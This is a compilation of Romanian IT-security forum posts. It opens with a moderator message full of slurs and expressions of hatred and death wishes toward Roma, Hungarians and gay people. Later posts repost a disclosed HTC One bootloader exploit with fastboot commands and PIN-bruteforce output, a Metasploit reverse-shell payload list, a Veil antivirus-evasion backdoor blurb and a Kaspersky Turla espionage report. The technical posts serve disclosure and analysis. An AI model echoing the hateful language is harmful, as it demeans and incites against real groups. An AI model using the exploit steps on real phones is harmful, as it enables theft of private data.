Nytro

Mugur Isarescu presedinte. Puie Monta!

Salut, Iti inteleg opiniile si sunt total de acord cu ele: ma pis pe tigani, unguri si homosexuali. DAR acesta este un forum de securitate IT. Aici discutam despre calculatoare. Poate si eu, de multe ori, vreau sa atrag atentia lumii asupra ciorilor, insa ma abtin pentru ca aici nu este locul potrivit pentru astfel de discutii. De asemenea, nu cred ca exista persoane in staff care sa agreeze aceste specimene. Cu totii ii uram, dar purtand niste discutii pe forum nu rezolvam nimic. Acest forum e pentru discutii legate de IT, atat. In alta ordine de idei, e ok sa deschizi 2-3 subiecte legate de aceste aspecte, insa nu prea le vad rostul aici. Lumea intra aici (sau cel putin asa ar trebui) sa vada ce mai e nou in domeniu, sa citeasca un tutorial sau sa urmareasca un videoclip. Sunt satul de cati tigani vad pe strada sau la TV, nu vreau sa vad si pe forum. Nu vreau sa vad si pe RST ca unguru' pulii vrea autonomie pentru ca imi creste pulsul dorindu-i moartea si nu face bine la sanatate. Concluzia e simpla: nu mai posta astfel de subiecte aici. Apoi, in legatura cu limbajul, e ok sa iti bagi pula in mortii si ranitii ungurilor si tiganilor, insa NU e ok sa faci acest lucru la adresa membrilor. Nu tinem cont de limbaj, dar nu toleram atacurile la persoana. Cu totii avem momente cand ne enervam, dar daca ne bagam pula intr-un moderator nu ne ajuta cu nimic, poate doar ne simtim 5 secunde mai bine. Noi te intelegem pe tine, sper sa ne intelegi si tu pe noi.

IBM SyNAPSE TrueNorth, creierul uman într-o pastil? de siliciu Dorian Prodan - 8 aug 201 Acum trei ani, IBM Research ?i universitatea Cornell au prezentat primul prototip al procesorului Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) ?i interesanta arhitectur? intern? a acestuia care imit? re?eaua neuronal? a creierului uman. Îmbun?t??it ?i eficientizat, procesorul SyNAPSE a evoluat, iar primul produs finit din aceast? gam? este preg?tit s? intre în produc?ie: TrueNorth.. Cercet?torii în domeniul inteligen?ei artificiale experimenteaz? de foarte mult? vreme cu solu?ii software din ce în ce mai avansate, îns? dezvoltatorii SyNAPSE consider? c? abordarea acestei dificile probleme cu ajutorul sistemelor de calcul obi?nuite este ineficient?. Dac? sistemele de calcul actuale ofer? capacit??i brute de procesare care dep??esc limitele creierului uman, acestea sunt îns? incapabile s? imite eficient fine?ea interconexiunilor neuronale care stau la baza gândirii independente ?i a con?tiin?ei. Acolo unde procesoarele actuale dau gre?, IBM Research ?i Cornell afirm? c? SyNAPSE str?luce?te. Noul procesor are 5,4 miliarde de tranzistori care sunt organiza?i în 4096 de nuclee, aceast? structur? fiind organizat? logic într-un milion de neuroni artificiali ?i 256 de milioane de sinapse. Fiecare dintre aceste nuclee are o capacitate de stocare de peste 100.000 de bi?i ?i un set de leg?turi sinaptice cu nucleele adiacente, ceea ce-i permite s? stocheze ?i s? proceseze informa?ii în acela?i spa?iu de memorie, s? ?in? minte neuronii de la care a primit sau c?tre care a trimis date ?i s? aprecieze puterea interconexiunilor, la fel ca un creier uman. Fiecare nucleu con?ine ?i hardware-ul necesar pentru adresarea unui neuron specific dintr-un alt nucleu, datele fiind generate în rafal? ?i fiind trimise prin re?eaua comun? sinaptic? din nod în nod pân? la destina?ie. Atunci când un nucleu nu are nimic de procesat, acesta se opre?te, iar acest mod de func?ionare asincron se reflect? ?i în eficien?a energetic? superioar?. Fabricat de c?tre Samsung într-un proces tehnologic pe 28 de nanometri, procesorul SyNAPSE TrueNorth func?ioneaz? la o frecven?? de numai 1 KHz ?i are un consum energetic infim de 70 mW. Aceste procesoare pot fi grupate la rândul lor în unit??i de procesare mai puternice, IBM afirmând c? saltul tehnologic este cople?itor: un sistem care poate fi ?inut în palm? ofer? puterea de procesare a unui rack întreg de sisteme de calcul tradi?ionale, iar testele energetice comparative au ar?tat c? SyNAPSE TrueNorth este de 176.000 de ori mai eficient decât un sistem de calcul standard ?i de 7000 de ori mai eficient decât un hardware specializat actual. Problema cea mai mare a noului procesor este oferta software s?rac? din acest moment. Implementarea hardware SyNAPSE a pornit de la fundamentul unei solu?ii software numit? Compass, iar toate aplica?iile Compass sunt compatibile cu TrueNorth. Pentru a pune în valoarea acest procesor în toate domeniile posibile, IBM ?i restul companiilor interesate vor trebui s? dezvolte solu?ii software mai complexe ?i mai variate. Compania crede îns? c? momentul în care vom vedea implement?ri cu sute de mii de nuclee, sute de milioane de neuroni ?i sute de miliarde de sinapse va sosi într-un viitor apropiat, iar acest lucru va revolu?iona întreaga industrie IT. Sursa: IBM SyNAPSE TrueNorth, creierul uman într-o pastil? de siliciu

Tepar. Topic inchis.

Ne-am lamurit. Esti tepar. Ban permanent.

Daca e cineva care doreste sa sustina o prezentare, ma poate contacta. Daca e cineva care poate gasi o sponsorizare, la firma care lucreaza de exemplu, il rog sa ma contacteze.

[h=4]Application Security Analyst[/h] Req. Number: 37027 Location Information: Bucharest, BUCHAREST, Romania We’re EA—the world’s largest video game publisher. You’re probably familiar with many of our titles—Madden, FIFA, The Sims, Need for Speed, Dead Space, Battlefield and Star Wars, to name a few. But maybe you don’t know how we’re committed to creating games for every platform—from social to mobile to console—to give our consumers that anytime, anywhere access they demand. What does that mean for you? It means more opportunities to unleash your creative genius, be inspired by those around you and ignite your path in any direction you choose. Application Security Specialist & Penetration Tester Summary: The Application Security Specialist and Penetration Tester is a member of the RedTeam within the Security and Risk Management (SRM) group, which provides security governance and support for EA’s business worldwide. We see the Application Security Specialist and Penetration Tester as a special breed of security consultant that tries to break into or find possible exploits in different computer systems and software. Some might call this position ethical hacker, what we’re looking for is a truly gifted, security minded hacker. You will be expected to find and exploit vulnerabilities in EA’s applications and infrastructure and fill out assessment reports to detail the findings. While you will often be running pre-determined types of tests based on industry standards, you will also be designing your own tests a large portion of the time, which requires creativity and imagination, along with a superb level of technical knowledge. With these tests and assessments, you'll be conducting regular security audits from both a logical/theoretical and a technical/hands-on standpoint. By identifying which flaws can be exploited to cause business risk, you will provide crucial insights into the most pressing issues and suggests how to prioritize security resources. The main focuses for this role are: To conduct dynamic application security analysis on a multitude of platforms: PC, web, mobile and consoles To exploit security flaws and vulnerabilities with attack simulations on multiple projects working against specific focused scopes of work To perform infrastructure security assessments (network and server side related security tasks) To advise and consult with EA staff in order to reduce risks To provide relevant metrics (improve existing and develop new ones) that allow the general business and SRM to understand risk as it pertains to the business and products Solve complex technical problems and articulate to non-IT personnel Perform, review and analyze security vulnerability data to identify applicability and false positives Research and develop testing tools, techniques, and process improvements Teach, learn and develop the skillset with the RedTeam In addition the successful candidate will: Have the ability to flow from black box to gray box to white box tests Work with product teams as well as core IT applications, infrastructure and operations to enhance the security of the corporation; communication and exposure to the management team will be required for this role Provide SRM with information necessary to improve security throughout the organization in SRM’s ongoing programs such as Security Awareness Enhance the existing library of development examples and materials to improve integrating security into the Software Development Life-Cycle (SDLC) Write guidelines and best practices from penetration test findings so teams can follow best practices on future development efforts Job required knowledge, skills and abilities: Relevant similar experience Very good understanding of OWASP Top 10 Experience with the inner workings and security aspects of variety of Application Servers, Web Servers, Media/Content Servers, Messaging Servers, Database Servers, and Integration Servers Excellent networking skills in multiple environments Experience with multiple Layer 7 intercepting proxies Knowledge of recognized security industry standards and best practices such as OWASP Testing Project, OSSTMM, PCI DSS, ISO 27000 set Good understanding of application development in multiple languages such as ASP.NET, Java, C/C++, and common scripting languages Excellent verbal, written, and interpersonal skills and professionalism in dealing with all levels of management and staff Additional, nice to have, skills and education: Bachelor’s degree in information technology related field An information security certification like CEH, ECSA, LPT, CCSP, CISSP, Security+ Experience with web application security assessment tools: HP Web Inspect, Qualys, Burp Suite Involved in security related Open Source projects and security groups Job Setting: The duties of this position will be performed at EA’s office in Bucharest. The candidate will be expected to work alone, around others, under minimal supervision and tight deadlines. Occasional travel will be required. *LI-ID1* It’s not easy building the world’s best digital playground. It’s hair-standing-on-end exhilarating. It’s down-in-the-trenches challenging. It’s stroke-of-brilliance-at-midnight creative. It’s you—taking risks, challenging yourself, pursuing ideas, changing the way millions of people do something they love: play. In an industry that’s changing every day, EA is positioned for growth thanks to smart business plans, strategic acquisitions, and most importantly, our creative people around the world who gather each day to unite the world through play. We take that last part very seriously, so if what you’re reading excites you as much as it does us, apply today. Pentru aplicare: http://careersearch.ea.com/ro/bucharest/it/jobid5649661-application-security-analyst-jobs Sau daca vreti sa ajung CV-ul direct pe unde trebuie, mi-l puteti da pe PM si il trimit eu mai departe.

Ok, acum se poate discuta altfel.

Lasati staff-ul. Lamuriti problema.

Basic Dynamic Analysis With Ida Pro And Windbg Description: In this video you will learn how to use IDA Pro and WinDBG for basic Dynamic Analysis. These tools are very powerful for reverse engineering process, Malware analysis, and finding the vulnerability. Source : - OpenSecurity Research Sursa: Basic Dynamic Analysis With Ida Pro And Windbg

Veil Framework - Create A Undetected Backdoor Description: In this video you will learn how to use Veil Framework for penetration testing. This is a very great solution for AV Evasion. Now a days our first challenge is to bypass AV and this framework is all about AV Evasion. Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions. https://www.veil-framework.com/framework/veil-evasion/ Sursa: Veil Framework - Create A Undetected Backdoor

Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password By cedric » Wednesday 23 July 2014, 11:50 - Forensics TL;DR This article deals with the presence of the « read_mmc » command in the HTC One phone. Our target phone had Android 4.2.2 and HBOOT 1.54.0000. This vulnerability has been reported to HTC in February 2014 and has been fixed with the Kit Kat (4.4.2) upgrade released in March 2014. Since then, HTC has told us it will be addressed into operators ROMs. We are happy to say that it has been patched in all of them except one. As a consequence, we have decided to release the information about it. The « read_emmc » command had already been disclosed in a previous article for the HTC Desire Z, released in 2011. This command allows an attacker with physical access to read the flash memory of the phone, and possibly get sensitive information such as SMS messages, contacts and so on. Furthermore, this command allows an attacker to bruteforce the PIN/passcode in an automatic way that would not be possible without it. It opens an additional breach against users that define easily-guessable PIN/passcodes (such as 4-digit PIN). It is often the case because this same PIN/passcode is also used to unlock the phone on a daily basis. Finally, the attack presented in this article also applies to HTC One devices where Full Disk Encryption (FDE) is enabled, i.e. when the phone is protected with Android encryption. The “read_mmc” command appears to be a debug function that is not on every HTC phone. In our opinion, this command should not appear in any released phone. This articles details the strong security mechanisms (AES encryption, correct key size, salt) used in Android FDE for the HTC One and the problematic context: the « read_mmc » debug command and a weak PIN/password allow an attacker to bruteforce it "offline" (from a computer) and access user protected data. Accessing the flash memory The HTC One is powered down and plugged to our computer. Then it is put in fastboot mode. This can be done by holding VOL DOWN + POWER buttons then releasing POWER while holding VOL DOWN. Then, we can switch from HBOOT to fastboot mode. From there, we can use the “fastboot” binary from Android SDK to read the flash memory. The command has the following format: command format: read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show] The arguments are defined as such: first parameter tells where to read from. “emmc” to read the flash. “sd” to read the sdcard start: offset (in blocks i.e. 512-byte units) in the raw flash memory #blocks: number of blocks to read #blocks/read: number of blocks to read at a time show: set to 1 to display the result An advised user may have noticed it is called "read_mmc" here instead of the older "read_emmc" command but its purpose is the same. To read the first sector, one can use the following command: $ fastboot oem read_mmc emmc 0 1 1 1 ... (bootloader) reading sector 0 ~ 0 (bootloader) 0 ... (bootloader) 0 (bootloader) DF (bootloader) FF (bootloader) 3 (bootloader) 0 (bootloader) 20 (bootloader) E0 (bootloader) 9F (bootloader) 3 (bootloader) 55 (bootloader) AA (bootloader) read sector done average = 172 OKAY [ 0.310s] finished. total time: 0.311s We can see it has lots of zeros at the beginning (more than 400 bytes) and it ends with the “55 AA” magic bytes, being the magic for a partition table. Using an ADB shell on the device, we see the userdata partition is the “mmcblk0p37” block device and starts at the 6422528th sector. It corresponds to the “ext4” mounted partition under Android. shell[COLOR=#000000][B]@[/B][/COLOR]android[COLOR=#666666][I]# cat /proc/emmc[/I][/COLOR] dev: [COLOR=#c20cb9][B]size[/B][/COLOR] erasesize name ... mmcblk0p37: [COLOR=#000000]680000000[/COLOR] 00000200 [COLOR=#ff0000]"userdata"[/COLOR] shell[COLOR=#000000][B]@[/B][/COLOR]android:[COLOR=#666666][I]# cat /sys/block/mmcblk0/mmcblk0p37/start[/I][/COLOR] [COLOR=#000000]6422528[/COLOR] shell[COLOR=#000000][B]@[/B][/COLOR]android:[COLOR=#666666][I]# mount[/I][/COLOR] ... [COLOR=#000000][B]/[/B][/COLOR]dev[COLOR=#000000][B]/[/B][/COLOR]block[COLOR=#000000][B]/[/B][/COLOR]mmcblk0p37 [COLOR=#000000][B]/[/B][/COLOR]data ext4 rw,nosuid,nodev,noatime,discard,noauto_da_alloc,[COLOR=#007800]data[/COLOR]=ordered [COLOR=#000000]0[/COLOR] [COLOR=#000000]0[/COLOR] Consequently, an attacker can use the “read_mmc” command and the previous offset (6422528 and after) in the flash memory to read any sector within the userdata partition even if the user defined a PIN/passcode to protect his phone. $ fastboot oem read_mmc emmc 6422530 1 1 1 ... (bootloader) reading sector 6422530 ~ 6422530 (bootloader) 0 ... (bootloader) 2F (bootloader) 64 (bootloader) 61 (bootloader) 74 (bootloader) 61 ... (bootloader) read sector done average = 146 OKAY [ 0.359s] finished. total time: 0.359s The “2F 64 61 74 61” sequence of bytes is the “/data” ascii string that is located at the beginning of the userdata partition. As we already detailed with the previous article, the first idea we got was to realize a dump of the whole userdata partition from the flash memory. However, it is really slow and it would take several days or even months. As a side note, the HTC One phone does not discharge when in HBOOT/fastboot modes and plugged to a computer. So it is theoretically “easier” to realize a whole dump as it was with the HTC Desire Z. Another approach is to use FUSE (Filesystem in Userspace) to mount the userdata partition remotely (over USB) from a computer. Mounting the partition only requires reading a few sectors and is significantly faster. We can then access any file. Indeed, this also works for the HTC One. Bypassing the Android Full Disk Encryption (FDE) When working on the HTC Desire Z, there was no “Full Disk Encryption” (FDE) option available because it was Android 2.x at that time and encryption is not supported before Android 4.x for mobile phones. We decided to analyze if there was a way to bypass FDE using the “read_mmc” vulnerability. Thomas Cannon has published back in 2012 at Defcon his excellent slides showing how FDE is working for default Android (based on Android source code, a.k.a AOSP) and scripts to both bruteforce the PIN/passcode and decrypt userdata sectors. At that time, he has been working on the Google Nexus S, which is a phone built by Google itself. Consequently, it uses the default Android sources and has not been modified by any manufacturer. This is different with our HTC One since this is HTC who built it from its own version of modified AOSP and hardware. We decided to encrypt the device by enabling it in “Storage > Phone storage encryption”. After dumping all the partitions and diffing them with a dump we made before encryption, we easily notice the “extra” partition is the FDE header used to store the encrypted master key. As detailed in Thomas slides, the PIN/passcode defined by the user is used in conjunction with the encrypted master key (between {...} below) and salt (between [...] below) to derive the decrypted master key. This decrypted master key is then used to decrypt each sector of the userdata partition. We can also infer from the header the algorithm used for the /data sector decryption (aes-cbc-essiv:sha256). $ hexdump -C extra 00000000 c4 b1 b5 d0 01 00 00 00 68 00 00 00 00 00 00 00 |........h.......| 00000010 20 00 00 00 00 00 00 00 00 00 40 03 00 00 00 00 | ........ @[URL="https://rstforums.com/forum/member.php?u=83354"].....[/URL]| 00000020 00 00 00 00 61 65 73 2d 63 62 63 2d 65 73 73 69 |....aes-cbc-essi| 00000030 76 3a 73 68 61 32 35 36 00 00 00 00 00 00 00 00 |v:sha256........| 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000060 00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c |.............T@.| 00000070 b4 c1 e4 91 69 10 4b 55 2e 47 64 31 13 52 ad 2d |....i.KU.Gd1.R.-| 00000080 bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00 |..B.............| 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000a0 00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39 |..........4....9| 000000b0 0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00 |.J..............| 000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000200 Note: for further details on the master key derivation and data decryption internals, we will definitely advise you to have a look at Thomas’ slides. Since we located where the encryption header is, we easily get the offset in the flash memory where it is stored. shell@android# cat /proc/emmc dev: size erasesize name ... mmcblk0p27: 00010000 00000200 "extra" shell@android:# cat /sys/block/mmcblk0/mmcblk0p27/start 586799 Then, we can double-check that our userdata partition is encrypted, as the first bytes amusingly tell it: “This is an encrypted device:)”. This is some kind of addition made by HTC for the HTC One specifically. They can do so because the first bytes are not used in a default ext4 partition. Everything else is random bytes, as expected. shell@android:# ./busybox hexdump -C /dev/block/mmcblk0p37 -n 64 00000000 54 68 69 73 20 69 73 20 61 6e 20 65 6e 63 72 79 |This is an encry| 00000010 70 74 65 64 20 64 65 76 69 63 65 3a 29 6f c3 a0 |pted device:)o..| 00000020 26 bc 76 ed a8 77 ef 6a 95 28 32 ab 24 ce 8d 58 |&.v..w.j.(2.$..X| 00000030 91 fe 8e 14 9e 81 05 a4 28 65 64 3c 1b e2 11 56 |........(ed<...V| 00000040 We can then check that we can access this header and the encrypted userdata partition from fastboot “read_mmc” command, which is indeed possible. $ fastboot oem read_mmc emmc 586799 1 1 1 From this, we can build a small script that will read the FDE header (located in the “extra” partition) and the first sector of the “userdata” partition and bruteforce them locally from our computer. [COLOR=#666666][I]# python bruteforce_htcone_over_reademmc.py[/I][/COLOR] oem read_mmc emmc 6422528 1 1 1 oem read_mmc emmc 586799 1 1 1 Footer File : extra Magic : 0xD0B5B1C4 Major Version : 1 Minor Version : 0 Footer Size : 104 bytes Flags : 0x00000000 Key Size : 256 bits Failed Decrypts: 0 Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400 Salt : 0xC71F34809709FD390B4A91D9D9D800CD [COLOR=#660033]----------------[/COLOR] Trying to Bruteforce Password... please [COLOR=#7a0874][B]wait[/B][/COLOR] Found PIN[COLOR=#000000][B]![/B][/COLOR]: 0000 Saving decrypted master key to 'keyfile' We can easily bruteforce any 4-digit PIN in a matter of minutes with a regular PC. This takes a little bit of time since the master key derivation needs 2000 iterations, but it is definitely possible. Additionally, we save the decrypted master key for further analysis. The PIN/passcode setup by the user is used for both: decrypting the phone when it is switched on (1) accessing the phone after a given delay during a regular day use (2) Even if the user wants to protect his phone with a complex PIN/password for (1), he will definitely want to use a simple one for (2) because he will use it a lot to access his phone. Consequently, the scenario of bruteforcing the PIN/passcode assuming that it is a 4-digit PIN (and not a complex one such as having digits and letters) makes sense. Moreover, encrypting one phone using schemes instead of PIN/password is not supported in Android for now. We can add that it would not help against bruteforce since the scheme is stored as a sequence of numbers that do not repeat. Mounting the userdata encrypted partition (remotely over USB) Since an attacker is able to bruteforce the PIN/passcode easily using what we explained above, he is able to switch on the phone normally and write the found PIN/passcode to bypass the lock screen. Then, he is able to enable ADB and dump everything he wants. We do not need to go further. However, as a need for completeness (and also because it is always interesting to know how to mount an encrypted userdata partition), we will detail how to do it. Basically, this consists of using cryptsetup (version >= 1.60 in order to support the plain type) specifying the “plain” type, the decryption algorithms (aes-cbc-essiv:sha256) and the “keyfile” holding our previously decrypted master key. [COLOR=#666666][I]# mkdir mnt[/I][/COLOR] [COLOR=#666666][I]# losetup /dev/loop0 userdata.img[/I][/COLOR] [COLOR=#666666][I]# cryptsetup –type plain open –c aes-cbc-essiv:sha256 –d keyfile /dev/loop0 userdata[/I][/COLOR] [COLOR=#666666][I]# mount /dev/mapper/userdata mnt[/I][/COLOR] In our case, we "even" can do it over USB using the “read_mmc” command. All the tools to replay these scenarios are released into our github repository. Again, we would like to thank HTC security team for their support and by patching this vulnerability in Kit Kat upgrade. Sursa: Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password - Sogeti ESEC Lab

Shellcode Detection and Emulation with Libemu Introduction Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/Honeypot systems for emulating the x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, analyze shellcode inside malicous .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article. The very first thing we can do is download Libemu via Git with the following command: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# git clone git://git.carnivore.it/libemu.git [/TD] [/TR] [/TABLE] If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 AnsiC code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it’s evident that about 50k lines of code has been written. The installation instructions can be found at [1], which is why we won’t describe them in this article. We can also install the Pylibemu, so we can interact with Libemu directly from Python. Creating the Shellcode Let’s create a simple text case with Metasploit to see how Libemu works. First, we have to create a shellcode with msfpayload, which is a command-line tool specifically built to generate and output various versions of shellcode. Let’s first present all Linux payloads by grepping for the “linux” keyword through msfpayload command output. # msfpayload -l 2>&1 | grep linux linux/armle/adduser Create a new user with UID 0 linux/armle/exec Execute an arbitrary command linux/armle/shell/bind_tcp Listen for a connection, dup2 socket in r12, then execve linux/armle/shell/reverse_tcp Connect back to the attacker, dup2 socket in r12, then execve linux/armle/shell_bind_tcp Connect to target and spawn a command shell linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc/shell_find_port Spawn a shell on an established connection linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc64/shell_find_port Spawn a shell on an established connection linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/exec Execute an arbitrary command linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/adduser Create a new user with UID 0 linux/x86/chmod Runs chmod on specified file with specified mode linux/x86/exec Execute an arbitrary command linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server linux/x86/meterpreter/bind_nonx_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server linux/x86/meterpreter/reverse_nonx_tcp Connect back to the attacker, Staged meterpreter server linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged) linux/x86/shell/bind_nonx_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged) linux/x86/shell/reverse_nonx_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute

Merita ascultat. "Ennnumereitor"

The Epic Turla Operation Solving some of the mysteries of Snake/Uroburos By GReAT on August 7, 2014. Technical Appendix with IOCs Executive Summary Over the last 10 months, Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call "Epic Turla". The attackers behind Epic Turla have infected several hundred computers in more than 45 countries, including government institutions, embassies, military, education, research and pharmaceutical companies. The attacks are known to have used at least two zero-day exploits: CVE-2013-5065 - Privilege escalation vulnerability in Windows XP and Windows 2003 CVE-2013-3346 - Arbitrary code-execution vulnerability in Adobe Reader We also observed exploits against older (patched) vulnerabilities, social engineering techniques and watering hole strategies in these attacks. The primary backdoor used in the Epic attacks is also known as "WorldCupSec", "TadjMakhal", "Wipbot" or "Tavdig". When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to "rescue" each other if communications are lost with one of the backdoors. Once the attackers obtain the necessary credentials without the victim noticing, they deploy the rootkit and other extreme persistence mechanisms. The attacks are still ongoing as of July 2014, actively targeting users in Europe and the Middle East. Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services subscribers. Contact: intelreports@kaspersky.com The Epic Turla attacks The attacks in this campaign fall into several different categories depending on the vector used in the initial compromise: Spearphishing e-mails with Adobe PDF exploits (CVE-2013-3346 + CVE-2013-5065) Social engineering to trick the user into running malware installers with ".SCR" extension, sometimes packed with RAR Watering hole attacks using Java exploits (CVE-2012-1723), Flash exploits (unknown) or Internet Explorer 6,7,8 exploits (unknown) Watering hole attacks that rely on social engineering to trick the user into running fake "Flash Player" malware installers The attackers use both direct spearphishing and watering hole attacks to infect their victims. Watering holes (waterholes) are websites of interest to the victims that have been compromised by the attackers and injected to serve malicious code. So far we haven't been able to locate any e-mail used against the victims, only the attachments. The PDF attachments do not show any "lure" to the victim when opened, however, the SCR packages sometime show a clean PDF upon successful installation. Some of known attachment names used in the spearphishing attacks are: ???? ????.rar (translation from Arabic: "Geneva conference.rar") NATO position on Syria.scr Note_?107-41D.pdf Talking Points.scr border_security_protocol.rar Security protocol.scr Program.scr In some cases, these filenames can provide clues about the type of victims the attackers are targeting. The watering hole attacks Currently, the Epic attackers run a vast network of watering holes that target visitors with surgical precision. Some of the injected websites include: The website of the City Hall of Pinor, Spain A site promoting entrepreneurship in the border area of Romania Palestinian Authority Ministry of Foreign Affairs In total, we observed more than 100 injected websites. Currently, the largest number of injected sites is in Romania. Here's a statistic on the injected websites: The distribution is obviously not random, and it reflects some of the interests of the attackers. For instance, in Romania many of the infected sites are in the Mures region, while many of the Spanish infected sites belong to local governments (City Hall). Most of the infected sites use the TYPO3 CMS (see: TYPO3 - The Enterprise Open Source CMS), which could indicate the attackers are abusing a specific vulnerability in this publishing platform. Injected websites load a remote JavaScript into the victim's browser: The script "sitenavigatoin.js" is a Pinlady-style browser and plugin detection script, which in turn, redirects to a PHP script sometimes called main.php or wreq.php. Sometimes, the attackers register the .JPG extension with the PHP handler on the server, using "JPG" files to run PHP scripts: Profiling script The main exploitation script "wreq.php", "main.php" or "main.jpg" performs a numbers of tasks. We have located several versions of this script which attempt various exploitation mechanisms. One version of this script attempts to exploit Internet Explorer versions 6, 7 and 8: Internet Explorer exploitation script Unfortunately, the Internet Explorer exploits have not yet been retrieved. Another more recent version attempts to exploit Oracle Sun Java and Adobe Flash Player: Java and Flash Player exploitation scripts Although the Flash Player exploits couldn't be retrieved, we did manage to obtain the Java exploits: [TABLE=width: 60%] [TR] [TD=width: 30%]Name[/TD] [TD=width: 70%]MD5[/TD] [/TR] [TR] [TD]allj.html[/TD] [TD]536eca0defc14eff0a38b64c74e03c79[/TD] [/TR] [TR] [TD]allj.jar[/TD] [TD]f41077c4734ef27dec41c89223136cf8[/TD] [/TR] [TR] [TD]allj64.html[/TD] [TD]15060a4b998d8e288589d31ccd230f86[/TD] [/TR] [TR] [TD]allj64.jar[/TD] [TD]e481f5ea90d684e5986e70e6338539b4[/TD] [/TR] [TR] [TD]lstj.jar[/TD] [TD]21cbc17b28126b88b954b3b123958b46[/TD] [/TR] [TR] [TD]lstj.html[/TD] [TD]acae4a875cd160c015adfdea57bd62c4[/TD] [/TR] [/TABLE] The Java files exploit a popular vulnerability, CVE-2012-1723, in various configurations. The payload dropped by these Java exploits is the following: [TABLE] [TR] [TD] MD5: d7ca9cf72753df7392bfeea834bcf992[/TD] [/TR] [/TABLE] The Java exploit use a special loader that attempts to inject the final Epic backdoor payload into explorer.exe. The backdoor extracted from the Java exploits has the following C&C hardcoded inside: [TABLE] [TR] [TD] www.arshinmalalan[.]com/themes/v6/templates/css/in.php[/TD] [/TR] [/TABLE] This C&C is still online at the moment although it redirects to a currently suspended page at "hxxp://busandcoachdirectory.com[.]au". For a full list of C&C servers, please see the Appendix. The Epic Turla attackers are extremely dynamic in using exploits or different methods depending on what is available at the moment. Most recently, we observed them using yet another technique coupled with watering hole attacks. This takes advantage of social engineering to trick the user into running a fake Flash Player (MD5: 030f5fdb78bfc1ce7b459d3cc2cf1877): In at least one case, they tried to trick the user into downloading and running a fake Microsoft Security Essentials app (MD5: 89b0f1a3a667e5cd43f5670e12dba411): The fake application is signed by a valid digital certificate from Sysprint AG: Serial number: ?00 c0 a3 9e 33 ec 8b ea 47 72 de 4b dc b7 49 bb 95 Thumbprint: ?24 21 58 64 f1 28 97 2b 26 22 17 2d ee 62 82 46 07 99 ca 46 